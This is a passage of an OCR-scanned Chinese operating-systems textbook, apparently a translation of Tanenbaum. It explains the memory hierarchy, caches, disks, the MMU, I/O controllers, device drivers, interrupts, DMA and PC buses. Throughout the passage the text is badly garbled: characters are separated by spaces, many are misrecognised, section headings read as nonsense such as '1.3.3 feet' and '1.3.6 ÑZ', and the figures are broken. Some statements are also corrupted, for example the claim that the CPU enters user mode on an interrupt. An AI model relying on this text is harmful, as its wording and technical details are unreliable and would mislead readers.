制 成 ， 所 以 和 CPU 一 样 快 。 显 然 ， 访 问 它们 是 没有 时 延 的 。 其 典型 的 


存储 容量 是 ， 在 32 位 CPU 中 为 32x32 位 ， 而 在 64 位 CPU 中 为 64x64 位 。 


在 这 两 种 情形 下 ， 其 存储 容量 都 小 于 1 KB。 程 序 必须 在 软件 中 上 自行 管 
理 这 些 寄存 器 ( 即 决 定 如 何 使 用 它们 ) 。 


下 一 层 是 高 速 缓存 ， 它 多 数 由 硬件 控制 。 主 存 被 分 割 成 高 速 缓存 
行 (cacheline) ， 其 典型 大 小 为 64 个 字 节 ， 地 址 0 至 63 对 应 高 速 缓存 行 
0， 地 址 64 至 127 对 应 高 速 缓存 行 1， 以 此 类 推 。 最 常用 的 高 速 缓存 行 放 
置 在 CPU 内 部 或 者 非常 接近 CPU 的 高 速 缓存 中 。 当 某 个 程序 需要 读 一 
个 存储 字 时 ， 高 速 缓存 硬件 检查 所 需要 的 高 速 缓存 行 是 否 在 高 速 缓存 
中 。 如 果 是 ， 称 为 高 速 缓存 命中 ， 缓 存 满足 了 请 求 ， 怠 不 需要 通过 
线 把 访问 请 求 送 往 主 存 。 高 速 缓存 命中 通常 需要 两 个 时 钟 周期 。 高 j 
缓存 未 命中 就 必须 访问 内 存 ， 这 要 付出 大 量 的 时 间 代 价 。 由 于 高 速 组 
存 的 价格 昂贵 ， 所 以 其 大 小 有 限 。 有 些 机 器 具有 两 级 甚至 三 级 高 速 组 
存 ， 每 一 级 高 速 缓存 比 前 一 级 慢 旦 容量 更 大 。 


缓存 在 计算 机 科学 的 许多 领域 中 起 着 重要 的 作用 ， 并 不 仅仅 只 是 
RAM 的 缓存 行 。 只 要 存在 大 量 的 资源 可 以 划分 为 小 的 部 分 ， 那 么 ， 这 
些 资源 中 的 某 些 部 分 就 会 比 其 他 部 分 更 频 每 地 得 到 使 用 ， 通 党 缓存 的 
使 用 会 市 来 性 能 上 的 改善 。 操 作 系统 一 直 在 使 用 缓存 。 例 如 ， 多 效 操 
作 系 统 在 内 存 中 保留 频繁 使 用 的 文件 (的 一 部 分 i ， 以 避免 从 磁盘 中 
重复 地 调 取 这 些 文件 。 相 似 地 ， 类 似 于 


/home/ast/projects/minix3/src/kernel/clock.c 


的 长 路 径 名 转换 成 文件 所 在 的 磁盘 地 址 的 结果 ， 也 可 以 放 入 缓 
存 ， 以 避免 重复 寻找 地 址 。 还 有 ， 当 一 个 web 页面 (URL) 的 地 址 转换 


为 网 络 地 址 〈P 地 址 ) 后 ， 这 个 转换 结果 也 可 以 缓存 起 来 以 供 将 来 使 
用 。 还 有 许多 其 他 的 类 似 的 应 用 。 


在 任何 缓存 系统 中 ， 都 有 若干 需要 尽快 考虑 的 问题 ， 包 括 : 


1) 何 时 把 一 个 新 的 内 容 放 入 缓存 。 


2) 把 新 内 容 放 在 缓存 的 哪 一 行 上 。 


3) 在 需要 时 ， 应 该 把 哪个 内 容 从 缓存 中 移 走 。 


人 应 该 把 新 移 走 的 内 容 放 在 某 个 较 大 存储 侨 的 何 处 。 


并 不 是 每 个 问题 的 解决 方案 都 符合 每 种 缓存 处 理 。 对 于 CPU 缓存 
中 的 主 存 缓存 行 ， 每 当 有 缓存 未 命中 时 ， 就 会 调 入 新 的 内 容 。 通 常 通 
过 所 引用 内 存 地 址 的 高 位 计算 应 该 使 用 的 缓存 行 。 例 如 ， 对 于 64 字 市 
的 4096 缓 存 行 ， 以 及 32 位 地 址 ， 其 中 6~17 位 用 来 定位 缓存 行 ， 而 0~5 
位 则 用 来 确定 缓存 行 中 的 字 节 。 在 这 个 例子 中 ， 被 移 走 内 容 的 位 置 就 
是 新 数据 要 进入 的 位 置 ， 但 是 在 有 的 系统 中 未 必 是 这 样 。 最 后 ， 当 将 
一 个 缓存 行 的 内 容重 写 进 主 存 时 〈 该 内 容 被 缓存 后 ， 可 能 会 被 修 
改 ) ， 通 过 该 地 址 来 惟一 确定 需 重 写 的 主 存 位 置 。 


缓存 是 一 种 好 方法 ， 所 以 现代 CPU 中 设计 了 两 个 缓 在。 第 一 级 或 
称 为 L1 缓 存 总 是 在 CPU 中 ， 通 常用 来 将 已 解码 的 指令 调 入 CPU 的 执行 
引擎 。 对 于 那些 频 和 党 使 用 的 数据 字 ， 多 数 忆 片 安排 有 第 二 个 L1 缓 存 。 


典型 的 L1 绥 存 大 小 为 16KB。 男 外 ， 往 往 还 设计 有 二 级 缓存 ， 称 为 L2 绥 
存 ， 用 来 存放 近来 所 使 用 过 符 干 兆 字 世 的 内 存 字 。L1 和 L2 缓 存 之 间 的 
送别 在 于 时 序 。 对 L1 缓 存 的 访问 ， 不 存在 任何 延 时 ， 而 对 L2 缓 存 的 访 
问 ， 则 会 延 时 1 或 2 个 时 钟 周期 。 


在 多 核 必 斤 中 。 设 计 师 必须 确定 缓存 的 位 置 。 在 图 1-8a 中 ， 一 个 
L2 绥 存 被 所 有 的 核 共 译 。Intel 多 核心 厂 采 用 了 这 个 方法 。 相 反 ， 在 图 1- 
8b 中 ， 每 个 核 有 其 自己 的 L2 缓 存 。AMD 采 用 这 个 方法 。 不 过 每 种 策略 
都 有 自己 的 优 缺 点 。 例 如 ，Intel 的 共 译 L2 绥 存 需 要 有 一 种 更 复杂 的 绥 
存 控制 做 ， 而 AMD 的 方式 在 设法 保持 L2 缓 存 一 致 性 上 存在 困难 。 


在 岁 1-9 的 层次 结构 中 ， 再 往 下 一 层 旦 主 存 。 这 和 是 存储 郁 系 统 的 主 
力 。 主 存 通常 称 为 随机 访问 存储 器 (Random Access Memory, 
RAM) 。 过 去 有 时 称 之 为 磁 忌 存储器， 因为 在 20 世 纪 50 年 代 和 60 年 
代 ， 使 用 很 小 的 可 磁化 的 铁 磁 体制 作 主 存 。 目 前 ， 存 储 天 的 容量 在 几 
百 兆 字 节 到 者 干 吝 字 节 之 间 ， 并 且 其 容量 正在 迅速 增长 。 所 有 不 能 在 
高 速 缓存 中 得 到 满足 的 访问 请 求 都 会 转 往 主 存 。 


除了 主 存 之 外 ， 许 多 计算 机 已 经 在 使 用 少量 的 非 易 失 性 随机 访问 
存储 器 。 它 们 与 RAM 不 同 ， 在 电源 切断 之 后 ， 非 易 失 性 随机 访问 存储 
器 并 不 丢失 其 内 容 。 只 读 存 储 器 (Read Only Memory, ROM) 在 工厂 
中 就 被 编程 完毕 ， 然 后 再 也 不 能 被 修改 。ROM 速 度 快 且 便 宜 。 在 有 些 


计算 机 中 ， 用 于 启动 计算 机 的 引导 加 载 模 块 就 存放 在 ROM 中 。 男 外 ， 
一 些 1//O 卡 也 采用 ROM 处 理 底 层 设备 控制 。 


EEPROM (Electrically Erasable PROM， 电 可 擦 除 可 编程 ROM) 和 
闪存 (flash memory) 也 是 非 易 失 性 的 ， 但 是 与 ROM 相 反 ， 它 们 可 以 擦 
除 和 重 写 。 不 过 重 写 它们 需要 比 写 入 RAM 更 高 数量 级 的 上 时间， 所 以 它 
们 的 使 用 方式 与 ROM 相 同 ， 而 其 与 众 不 同 的 特点 使 它们 有 可 能 通过 字 
段 重 写 的 方式 纠正 所 保存 程序 中 的 错误 。 


在 便携 式 电子 设备 中 ， 内 存 通 芝 作为 存储 将 介 。 内 存 起 数码 相机 
中 的 胶卷 ， 是 便携 式 首 乐 播放 器 的 磁盘 ， 这 仅仅 是 内 存 用 途中 的 两 
项 。 闪 存在 速度 上 介 于 RAM 和 磁盘 之 间 。 另 外 ， 与 磁盘 存储 器 不 同 ， 
如 采 内 存 擦 除 的 次 数 过 多 ， 就 被 磨损 了 。 


还 有 一 类 存储 万 是 CMOS， 它 是 易 失 性 的 。 许 多 计算 机 利用 CMOS 
存储 器 保持 当前 时 间 和 日 期 。CMOS 存 储 器 和 递增 时 间 的 时 钟 电路 由 一 
块 小 电池 驱动 ， 所 以 ， 即 使 计算 机 没有 上 电 ， 时 间 也 仍然 可 以 正确 地 
更 新 。CMOS 存 储 器 还 可 以 保存 配置 参数 ， 诸 如 ， 哪 一 个 是 启动 磁盘 
等 。 之 所 以 采用 CMOS 是 因为 它 消 耗 的 电能 非常 少 ,一块 工 厂 原 浅 的 电 
池 往 往 就 能 使 用 耕 干 年 。 但 是 ， 当 电池 开始 失效 时 ， 计 算 机 束 会 出 
现 “Alzheimer 病 症 ” 趾 计算 机 会 起 记 掉 记忆 多 年 的 事物 ， 比 如 应 该 由 哪 


(MEERA BSE ° 


[1] 一 种 病因 未 明 的 原 发 退行 性 大 脑 疾病 ， 以 记忆 受 损 为 主要 特征 ， 是 
老年 性 痴 采 中 最 常见 的 一 种 类 型 。 一 一 详 痢 注 


1.3.3 feet 


下 一 个 层次 是 磁盘 (硬盘) 。 磁 强 同 RAM 相 比 ， 每 个 二 进 制 位 的 
成 本 低 了 两 个 数量 级 ， 而 且 经 滑 也 有 两 个 数量 级 大 的 容量 。 位 盘 惟 一 
的 问题 是 随机 访问 数据 时 间 大 约 慢 了 三 个 数量 级 。 其 低速 的 原因 是 因 
为 磁盘 是 一 种 机 械 竣 置 ， 如 儿 1-10 所 示 。 


读 / 写 头 
(每 个 盘面 1 个 ) 


fill 7 
盘面 
Fa (Hl 
fit Hl 4 
盘面 3 
盘面 
盘面 


盘面 0 


om 


— M 


1-10 ”磁盘 驱动 右 的 构造 


在 一 个 磁盘 中 有 一 个 或 多 个 金属 盘 片 ， 它 们 以 5400，7200 或 10 
800rpm 的 速度 旋转 。 从 边缘 开始 有 一 个 机 械 臂 县 横 在 盘面 上 ， 这 类 似 
于 老式 播放 塑料 唱片 33 转 唱机 上 的 拾 音 臂 。 信 息 写 在 磁盘 上 的 一 系列 


同心 圆 上 。 在 任意 一 个 给 定 臂 的 位 置 ， 每 个 磁头 可 以 读 取 一 段 环形 区 
域 ， 称 为 磁道 (track) 。 把 一 个 给 定 臂 的 位 置 上 的 所 有 磁道 合并 起 
来 ， 组 成 了 一 个 柱 面 (cylinder) 。 


每 个 磁 站 划 分 为 大 干 届 区 ， 届 区 的 典型 值 是 512 子 节 。 在 现代 磁 副 
中 ， 较 外 面 的 柱 面 比较 内 部 的 柱 面 有 更 多 的 局 区 。 机 械 辟 从 一 个 柱 面 
移 到 相 邻 的 柱 面 大 约 需 要 1ms。 而 随机 移 到 一 个 柱 面 的 典型 时 间 为 5ms 
至 10ms， 其 具体 时 间 取 决 于 驱动 右 。 一 旦 们 辟 到 达 正 确 的 磁 道 上 ， 驱 
动 絮 必须 等 每 所 需 的 司 区 旋转 到 磁 尖 之 下 ， 这 就 增加 了 5ms 至 10ms 的 
时 延 ， 其 具体 延 时 取决 于 驱动 器 的 转速 。 一 旦 所 需要 的 而 区 移 到 磁头 
之 下 ， 束 开始 读 写 ， 低 症 硬 盘 的 速率 古 5MB/s， 而 高 速 磁 副 的 速率 是 


160 MB/s ° 


许多 计算 机 支持 一 种 著名 的 虚拟 内 存 机制 ， 这 将 在 第 3 章 中 讨论 。 
这 种 机 制 使 得 期 望 运行 大 于 物理 内 存 的 程序 成 为 可 能 ， 其 方法 是 将 程 
序 放 在 人 磁盘 上 ， 而 将 主 存 作 为 一 种 缓存 ， 用 来 保存 最 频繁 使 用 的 部 分 
程序 。 这 种 机 制 需 要 快速 地 映像 内 存 地 址 ， 以 便 把 程序 生成 的 地 址 转 
换 为 有 关 字 节 在 RAM 中 的 物理 地 址 。 这 种 映像 由 CPU 中 的 一 个 部 件 ， 
称 为 存储 器 管理 单元 (Memory Management Unit, MMU) 来 完成 ， 如 
图 1-6 所 示 。 


缓存 和 MMU 的 出 现 对 系统 的 性 能 有 着重 要 的 影响 。 在 多 道 程 序 系 
统 中 ， 从 一 个 程序 切换 到 另 一 个 程序 ， 有 时 称 为 上 下 文 切 换 (context 


switch) ， 有 必要 对 缓存 中 来 的 所 有 修改 过 的 块 进行 写 回 磁盘 操作 ， 
并 修改 MMU 中 的 映像 寄存 器 。 但 是 这 两 种 操作 的 代价 很 昂贵 ， 所 以 程 
序 员 们 努力 避免 使 用 这 些 操 作 。 我 们 稍 后 将 看 到 这 些 操作 产生 的 影 

响 。 


1.3.4 RET 
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装 到 磁带 机 上 ， 可 以 人 工 安装 也 可 用 机 器 人 安装 〈 在 大 型 数据 库 中 通 
常安 装 有 自动 磁带 处 理 设备 ) 。 然 后 ， 磁 带 可 能 还 需要 向 前 绕 转 以 便 
读 取 所 请 求 的 数据 块 。 总 之 ， 这 一 切 工 作 要 花费 儿 分 钟 。 磁 市 的 最 大 
特点 是 每 个 二 进 制 位 的 成 本 极其 便宜 ， 并 且 是 可 移动 的 ， 这 对 于 为 了 
能 在 火灾 、 洪 水 、 地 震 等 灾害 中 存活 下 来 ， 必 须 离线 存储 的 备份 磁 市 
而 言 ， 征 非常 重要 的 。 


我 们 已 经 讨论 过 的 存储 器 体系 结构 是 典型 的 ， 但 是 有 的 安 逆 系统 
并 不 具备 所 有 这 些 层次 ， 或 者 有 所 差别 《诸如 光盘 ) 。 不 过 ， 在 所 有 
的 系统 中 ， 当 层次 下 降 时 ， 其 随机 访问 时 间 则 明显 地 增加 ， 容 量 也 同 
样 明显 地 增加 ， 而 每 个 二 进 制 位 的 成 本 则 大 幅度 下 降 。 其 结果 十， 这 
种 存储 右 体 系 结构 似乎 还 要 伴随 我 们 多 年 。 


1.3.5 IO 设备 


CPU 和 存储 喜 不 是 操作 系统 惟一 需要 管理 的 资源 。IO 设 备 也 与 操 
作 系 统 有 密切 的 相互 影响 。 如 图 1-6 所 示 ，LIO 设 备 一 般 包 括 两 个 部 分 : 
设备 控制 项 和 设备 本 号 。 控 制 句 羡 插 在 电路 板 上 的 一 块 心 片 或 一 组 心 
请 ， 这 块 电路 板 物 理 地 控制 设备 。 它 从 操作 系统 接收 命令 ， 例 如， 从 
设备 读数 据 ， 并 且 完 成 数据 的 处 理 。 


在 许多 情形 下 ， 对 这 些 设 备 的 控制 是 非常 复杂 和 具体 的 ， 所 以 ， 
控制 器 的 任务 是 为 操作 系统 提供 一 个 简单 的 接口 〈 不 过 还 是 很 复杂 

的 ) 。 例 如 ， 磁 盘 控 制 器 可 以 接受 一 个 命令 从 磁盘 2 读 出 11206 号 局 

区 ， 然 后 ， 探 制 器 把 这 个 线性 扇 区 号 转化 为 柱 面 、 扇 区 和 磁头 。 由 于 
外 柱 面 比 内 柱 面 有 较 多 的 硝 区， 而 且 一 些 坏 户 区 已 经 家 映射 到 人 磁 僵 的 
其 他 车 方 ， 所 以 这 种 转换 将 是 很 复杂 的 。 伍 到 控 制 胡 必须 确定 磁头 展 
应 该 在 哪个 柱 面 上 ， 并 对 磁头 臂 发 出 一 串 脉 冲 使 其 前 后 移动 到 所 要 求 
的 柱 面 号 上 ， 接 着 必须 等 待 对 应 的 悄 区 转动 到 磁头 下 面 并 开始 读 出 数 
据 ， 随 着 数据 从 驱动 器 读 出 ， 要 消去 引导 块 并 计算 校 验 和 。 最 后 ， 还 
得 把 输入 的 二 进 制 位 组 成 字 并 存放 到 存储 右 中 。 为 了 要 完成 这 些 工 

作 ， 在 控制 夯 中 经 和 安 竣 一 个 小 的 藤 入 式 计算 机 ， 该 仍 入 式 计算 机 运 
行为 执行 这 些 工作 而 专门 编 好 的 程序 。 


IO 设备 的 另 一 个 部 分 是 实际 设备 的 自身 。 设 备 本 身 有 个 相对 简单 
的 接口 ， 这 是 因为 接口 有 既 不 能 做 很 多 工作 ， 又 已 经 被 标准 化 了 “。 标 准 
化 是 有 必要 的 ， 这 样 任何 一 个 IDE 和 位 盘 控制 器 就 可 以 适应 任 一 种 IDE 磁 
盘 ， 例 如 ，IDE 表 示 和 集成 驱动 器 电子 设备 (Integrated Drive 
Electronics) ， 是 许多 计算 机 的 磁盘 标准 。 由 于 实际 的 设备 接口 隐藏 在 
控制 器 中 ， 所 以 ， 操 作 系统 看 到 的 是 对 控制 器 的 接口 ， 这 个 接口 可 能 
和 设备 接口 有 很 大 的 差别 。 


每 类 设备 控制 器 都 是 不 同 的 ， 所 以 ， 需 要 不 同 的 软件 进行 控制 。 
专门 与 控制 器 对 话 ， 发 出 命令 并 接收 响应 的 软件 ， 称 为 设备 驱动 程序 
(device driver) 。 每 个 控制 器 三家 必须 为 所 文 持 的 操作 系统 提供 相应 
的 设备 驱动 程序 。 例 如 ， 一 台 扫 揪 仪 会 配 有 用 于 Windows 2000、 
Windows XP、Vista 以 及 Linux 的 设备 驱动 程序 。 


为 了 能 够 使 用 设备 驱动 程序 ， 必 须 把 设备 驱动 程序 装 入 到 操作 系 
统 中 ， 这 样 它 可 在 核心 态 中 运行 。 理 论 上 ， 设 备 驱 动 程序 可 以 在 内 核 
外 运行 ， 但 是 几乎 没有 系统 文 持 这 种 可 能 的 方式 ， 因 为 它 要 求 允 许 在 
用 户 空 间 的 设备 驱动 程序 能 够 以 控制 的 方式 访问 设备 ， 这 是 一 种 极 少 
得 到 支持 的 功能 。 要 将 设备 驱动 程序 疾 入 操作 系统 ， 有 三 个 途径 。 第 
一 个 途径 是 将 内 核 与 设备 驱动 程序 重新 链接 ， 然 后 重启 动 系统 。 许 多 
UNIX 系 统 以 这 种 方式 工作 。 第 二 个 途径 是 在 一 个 操作 系统 文件 中 设置 
一 个 入 口 ， 并 通知 该 文件 需要 一 个 设备 驱动 程序 ， 然 后 重启 动 系 统 。 


在 系统 启动 时 ， 操 作 系 统 去 找寻 所 需 的 设备 驱动 程序 并 装载 之 。 
Windows 就 是 以 这 种 方式 工作 。 第 三 种 途径 是 ， 操 作 系 统 能 够 在 运行 时 
接受 新 的 设备 驱动 程序 并 且 立 即将 其 安装 好 ， 无 须 重启 动 系统 。 这 种 
方式 采用 的 较 少 ， 但 是 这 种 方式 正在 变 得 普及 起 来 。 热 插 拨 设备 ， 诸 
如 USB 和 IEEE1394 设 备 (后 面 会 讨论 ， 都 需要 动态 可 装载 设备 驱动 程 
序 。 


每 个 设备 控制 紫 部 有 少量 的 用 于 通信 的 寄存 占 。 例 如 ， 一 个 最 小 
的 磁 副 控制 器 也 会 有 用 于 指定 磁盘 地 址 、 内 存 地 址 、 扇 区 计数 和 方 癌 
( 读 或 写 ) 的 寄存 器 。 要 激活 控制 器 ， 设 备 驱 动 程序 从 操作 系统 获得 
一 条 命令 ， 然 后 翻译 成 对 应 的 值 ， 并 写 进 设备 寄存 郁 中 。 所 有 设备 寄 
存 器 的 集合 构成 了 IO 端口 空间 ， 我 们 将 在 第 5 草 讨 论 有 关内 容 。 


在 有 些 计算 机 中 ， 设 备 寄存 器 被 映射 到 操作 系统 的 地 址 空间 GR 
作 系 统 可 使 用 的 地 址 ) ， 这 样 ， 它 们 就 可 以 像 普通 存储 字 一 样 读 出 和 
写 入 。 在 这 种 计算 机 中 ， 不 需要 专门 的 VO 指令 ， 用 户 程 序 可 以 被 硬件 
阻挡 在 外 ， 防 止 其 接触 这 些 存 储 器 地 址 (例如 ， 采 用 基 址 和 界限 寄存 
器 ) 。 在 另外 一 些 计 算 机 中 ， 设 备 寄存 器 被 放 入 一 个 专门 的 IO 端口 空 
间 中 ， 每 个 寄存 器 都 有 一 个 端口 地 址 。 在 这 些 机 器 中 ， 提 供 在 内 核 态 
中 可 使 用 的 专门 IN 和 OUT 指 令 ， 供 设备 驱动 程序 读 写 这 些 寄存 器 用 。 
前 一 种 方式 不 需要 专门 的 IO 指令 ， 但 是 占用 了 一 些 地 址 空间 。 后 者 不 
占用 地 址 空间 ， 但 是 需要 专门 的 指令 。 这 两 种 方式 的 应 用 都 很 广泛 。 


实现 输入 和 输出 的 方式 有 三 种 。 在 最 简单 的 方式 中 ， 用 户 程序 发 
出 一 个 系统 调用 ， 内 核 将 其 翻译 成 一 个 对 应 设备 驱动 程序 的 过 程 调 
用 。 然 后 设备 驱动 程序 启动 1O 并 在 一 个 连续 不 断 的 循环 中 检查 该 设 
备 ， 看 该 设备 是 否 完 成 了 工作 (一 般 有 一 些 二 进 制 位 用 来 指示 设备 仍 
fEILTR HF) 。 当 WO 结束 后 ， 设 备 驱 动 程序 把 数据 送 到 指定 的 地 方 ( 若 
有 此 需要 ) ， 并 返回 。 然 后 操作 系统 将 控制 返回 给 调用 者 。 这 种 方式 
称 为 忙 等 待 (busy waiting) ， 其 缺点 是 要 占据 CPU，CPU 一 直 轮 询 设 
备 直 到 对 应 的 W/O 操作 完成 。 


第 二 种 方式 是 设备 驱动 程序 启动 设备 并 且 让 该 设备 在 操作 完成 时 
发 出 一 个 中 断 。 设 备 驱动 程序 在 这 个 时 刻 返 回 。 操 作 系 统 接 着 在 需要 
时 阻塞 调用 者 并 安排 其 他 工作 进行 。 当 设备 驱动 程序 检测 到 该 设备 的 
操作 完毕 时 ， 它 发 出 一 个 中 断 通知 操作 完成 。 


在 操作 系统 中 ， 中 断 是 非常 重要 的 ， 所 以 需要 更 具体 地 讨论 。 在 
图 1-11a 中 ， 有 一 个 W/O 的 三 步 过 程 。 在 第 1 步 ， 设 备 驱 动 程序 通过 写 设 
备 寄存 亏 通 知 设备 控制 铸 做 人 什么。 然后， 设备 控制 夯 局 动 该 设备 。 当 
设备 控制 絮 传 送 完 毕 彼 告知 的 要 进行 读 写 的 字 市 数量 后 ， 它 在 第 2 步 中 
使 用 特定 的 忌 线 发 信号 给 中 断 控制 占 忌 片 。 如 琳 中 断 控 制 右 已 经 准备 
接收 中 断 (如 果 正 忙于 一 个 更 高 级 的 中 断 ， 也 可 能 不 接收 )” ， 它 会 在 
CPU 心 片 的 一 个 管 脚 上 声明 ， 这 束 古 第 3 步 。 在 第 4 步 中 ， 中 断 控 制 紫 


把 该 设备 的 编号 放 到 总 线 上 ， 这 样 CPU 可 以 读 总 线 ， 并 且 知 道 哪个 设 
备 刚 刚 完 成 了 操作 〈 可 能 同时 有 许多 设备 在 运行 ) 。 


磁盘 
驱动 器 


2. 分 派 给 


处 理 程序 十 | | 


中 断 处 理 程序 
a) b) 
图 1-11 9 局 动 一 个 IO 设备 并 发 出 中 断 的 过 程 ; b) 中 断 处 理 过 程 包括 
取 中 断 、 运 行 中 断 处 理 程序 和 返回 到 用 户 程 序 


一 旦 CPU 决定 取 中 断 ， 通 常 程 序 计 数 器 和 PSW 就 被 压 入 当前 堆栈 

中 ， 并 且 CPU 被 切换 到 用 户 态 。 设 备 编号 可 以 成 为 部 分 内 存 的 一 个 引 

用 ， 用 于 寻找 该 设备 中 断 处 理 程序 的 地 址 。 这 部 分 内 存 称 为 中 断 癌 量 

(interrupt vector) 。 当 中 上 断 处 理 程 序 (中断 设 备 的 设备 驱动 程序 的 一 

部 分 ) 开始 后 ， 它 取 走 已 入 栈 的 程序 计数 器 和 PSW， 并 保存 之 ， 然 后 

查询 设备 的 状态 。 在 中 断 处 理 程序 全 部 完成 之 后 ， 它 返回 到 先前 运行 
的 用 户 程序 中 尚未 执行 的 头 一 条 指令 。 这 些 步 又 如 图 1-11b 所 示 。 


第 三 种 方式 是 ， 为 IO 使 用 一 种 特殊 的 直接 存储 器 访问 (Direct 
Memory Access, DMA) 必 片 ， 它 可 以 控制 在 内 存 和 某 些 控制 器 之 间 的 
位 流 ， 而 无 须 持 续 的 CPU 干预 。CPU 对 DMA 世 片 进 行 设 置 ， 说 明 需 要 
传送 的 字 世 数 、 有 关 的 设备 和 内 存 地 址 以 及 操作 方向 ， 接 着 启动 
DMA。 当 DMA 心 斤 完 成 时 ， 它 引发 一 个 中 断 ， 其 处 理 方 式 如 前 所 述 。 
有 关 DMA 和 IO 硬件 会 在 第 5 章 中 具体 讨论 。 


中 断 经 党 会 在 非常 不 合适 的 时 刻 发 生 ， 比 如 ， 在 另 一 个 中 断 程序 
正在 运行 时 发 生 。 正 由 于 此 ，CPU 有 办 法 关闭 中 断 并 在 稍 后 再 开启 中 
断 。 在 中 断 关 闭 时 ， 任 何 已 经 发 出 中 断 的 设备 ， 可 以 继续 保持 其 中 断 
信和 号， 但 是 CPU 不 会 被 中断， 直至 中 断 再 次 局 用 为 止 。 如 琳 在 中 断 天 
闭 时 ， 已 有 多 个 设备 发 出 了 中 断 ， 中 断 控制 紫 将 决定 先 处 理 哪 个 中 
断 ， 通 常 这 取决 于 事先 赋予 每 个 设备 的 静态 优先 级 。 最 高 优先 级 的 设 


1.3.6 ÑZ 


图 1-6 中 的 结构 在 小 型 计算 机 中 使 用 了 多 年 ， 并 也 用 在 早期 的 [BM 
PC 中 。 但 是 ， 随 着 处 理 器 和 存储 器 速度 越 来 越 快 ， 到 了 某 个 转折 点 
时 ， 单 总 线 (当然 还 有 IBM PC 总 线 ) 就 很 难处 理 总 线 的 交通 流量 了 ， 
只 有 放弃 。 其 结果 是 导致 其 他 的 总 线 出 现 ， 它 们 处 理 WO 设 备 以 及 CPU 
到 存储 妖 的 速度 都 更 快 。 这 种 演化 的 结果 是 ， 目 前 一 台 较 大 的 Pentium 


系统 的 结构 如 图 1-12 所 示 。 
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图 1-12 大 型 Penti um 系统 的 结构 


图 中 的 系统 有 8 个 总 线 〈 高 速 缓存 、 局 部 、 内 存 、PCI、SCSI、 
USB、IDE 和 ISA) ， 每 个 总 线 传输 速度 和 功能 都 不 同 。 操 作 系 统 必 须 
了 解 所 有 总 线 的 配置 和 管理 。 有 两 个 主要 的 总 线 ， 即 早期 的 IBM PC 
ISA (Industry Standard Architecture) 总 线 和 它 的 后 继 者 PCI (Peripheral 
Component Interconnect) 总 线 。ISA 总 线 就 是 原先 的 IBM PC/AT 总 线 ， 
以 8.33MHz 频 率 运 行 ， 可 并 行 传送 2 字 节 ， 最 大 速率 为 16.67MB/s。 它 还 
可 与 老式 的 慢 速 /O 卡 向 后 兼容 。PCI 总 线 作 为 I SA 总 线 的 后 继 者 由 Intel 
公司 发 布 。 它 可 在 66MHz 频 率 运 行 ， 可 并 行 传送 8 字 节 ， 数 据 速率 为 
528MB/s。 目 前 多 数 高 速 JO 设 备 采 用 PCI 总 线 。 由 于 有 大 量 的 IO 卡 采 
用 PCI 总 线 ， 甚 至 许多 非 Intel 计 算 机 也 使 用 PCI 总 线 。 现 在 ， 使 用 称 为 
PCI Express 的 PCI 总 线 升 级 版 的 新 计算 机 已 经 出 现 。 


在 这 种 配置 中 ，CPU 通 过 局 部 总 线 与 PCI 桥 芯片 对 话 ， 而 PCI 桥 芯 
片 通过 专门 的 存储 总 线 与 存储 器 对 话 ， 一 般 速 率 为 100MHz。Pentium 
系统 在 世 片 上 有 1 级 高 速 缓存 ， 在 世 片 外 有 一 个 非常 大 的 2 级 高 速 缓 
存 ， 它 通过 高 速 缓存 总 线 与 CPU 连接 。 


另外 ， 在 这 个 系统 中 有 三 个 专门 的 总 线 : IDE、USB 和 SCSI。IDE 
总 线 将 诸如 磁盘 和 CD-ROM 一 类 的 外 部 设备 与 系统 相连 接 。IDE 总 线 是 
PC/AT 的 磁盘 控制 器 接口 的 副产品 ， 现 在 几乎 成 了 所 有 基于 Pentium 系 
统 的 硬盘 的 标准 ， 对 于 CD-ROM 也 经 常 是 这 样 。 


i FA EB TA (Universal Serial Bus, USB) 是 用 来 将 所 有 慢 速 1/O 
设备 ， 诸 如 键盘 和 鼠标 ， 与 计算 机 连接 。 它 采用 一 种 小 型 四 针 连 接 
器 ， 其 中 两 针 为 USB 设 备 提供 电源 。USB 是 一 种 集中 式 总 线 ， 其 根 设 
备 每 1ms 轮 询 一 次 WO 设备 ， 看 是 否 有 信息 收发 。USB1.0 可 以 处 理 总 计 
为 1.5MB/s 的 负载 ， 而 较 新 的 USB2.0 总 线 可 以 有 60MB/s 的 速率 。 所 有 
的 USB 设 备 共享 一 个 USB 设 备 驱 动 右 ， 于 是 就 不 需要 为 新 的 USB 设 备 安 
装 新 设备 驱动 器 了 。 这 样 ， 无须 重新 启动 就 可 以 给 计算 机 添加 USB 设 
备 o 


SCSI (Small Computer System Interface) 总 线 是 一 种 高 速 总 线 ， 用 
在 高 速 硬盘 、 扫 描 仪 和 其 他 需要 较 大 带宽 的 设备 上 。 它 最 高 可 达 
320MB/s。 自 从 其 发 布 以 来 ， SCSI 总 线 一 直 用 在 Macintosh 系 统 上 ， 在 
UNIX 和 一 些 基于 Intel 的 系统 中 也 很 流行 。 


还 有 一 种 总 线 (图 1-12 中 没有 展示 ) 是 IEEE 1394。 有 时 ， 它 称 为 
火线 (FireWire) ， 严 格 来 说 ， 火 线 是 苹果 公司 具体 实现 1394 的 名 称 。 
与 USB 一 样 ，IEEE 1394 是 位 串 行 总 线 ， 设 计 用 于 最 快 可 达 100MB/s 的 
包 传送 中 ， 它 适合 于 将 数码 相机 和 类 似 的 多 媒体 设备 连接 到 计算 机 
E ° IEEE 1394 与 USB 不 同 ， 不 需要 集中 式 控制 器 。 


要 在 如 图 1-12 展 示 的 环境 下 工作 ， 操 作 系统 必须 了 解 有 些 什 么 外 部 
设备 连接 到 计算 机 上 ， 并 对 它们 进行 配置 。 这 种 需求 导致 mtel 和 微软 设 
计 了 一 种 名 为 即 插 即 用 (plug and play) 的 VO 系统 ， 这 是 基于 一 种 首先 


被 苹果 Macintosh 实 现 的 类 似 概 念 。 在 即 插 即 用 之 前 ， 每 块 /O 卡 有 一 个 
回 定 的 中 断 请 求 级 别 和 用 于 其 WO 寄存 器 的 固定 地 址 ， 例 如 ， 键 盘 的 中 
断 级 别 是 1， 并 使 用 0x60 至 0x64 的 MO 地 址 ， 软 盘 控 制 器 是 中 断 6 级 并 使 
用 0x3F0 人 至 0x3F7 的 MO 地 址 ， 而 打印 机 是 中 断 7 级 并 使 用 0x378 至 0x37A 
的 IO 地 址 等 。 


到 目前 为 止 ， 一 切 正 第 。 比 如 ， 用 户头 了 一 块 声卡 和 调制 解 调 
卡 ， 并 且 它 们 部 是 可 以 使 用 中 断 4 的 ， 但 此 时 ， 问 题 发 生 了 ， 两 块 卡 互 
